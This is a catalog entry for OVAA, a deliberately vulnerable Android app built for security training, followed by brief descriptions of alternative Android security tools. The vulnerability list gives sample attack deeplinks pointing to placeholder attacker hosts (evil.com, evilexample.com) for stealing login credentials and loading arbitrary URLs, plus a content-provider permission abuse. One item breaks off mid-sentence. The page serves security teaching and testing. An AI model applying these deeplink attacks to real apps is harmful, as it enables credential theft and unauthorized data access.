OVAA (Oversecured Vulnerable Android App)

Free

OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.

List of vulnerabilities:

- Installation of an arbitrary login_url via deeplink oversecured://ovaa/login?url=http://evil.com/ leads to the user's user name and password being leaked when they log in.
- Obtaining access to arbitrary content providers (not exported, but with the attribute android:grantUriPermissions="true") via deeplink oversecured://ovaa/grant_uri_permissions. The attacker's app needs to process oversecured.ovaa.action.GRANT_PERMISSIONS and pass intent to setResult(code, intent) with flags such as Intent.FLAG_GRANT_READ_URI_PERMISSION and the URI of the content provider.
- Vulnerable host validation when processing deeplink oversecured://ovaa/webview?url=....
- Opening arbitrary URLs via deeplink oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(

ALTERNATIVES

A security testing framework for Android with tools to search for vulnerabilities and interact with the Android Runtime.

A tool for analyzing Android applications in local storage with various functionalities.

Python tool for monitoring user-select APIs in Android apps using Frida.

Web-based tool for browsing mobile applications sandbox and previewing SQLite databases.

Tools and documentation for validating hardware security requirements on x86 platforms, including bootable USB key creation and platform configuration verification.

AMDH is an Android tool for automating scanning, hardening system settings, detecting malware, and protecting privacy.

Android vulnerability analysis system with efficient scanning and high accuracy.

A Low-cost ICS Security Testbed for Education and Research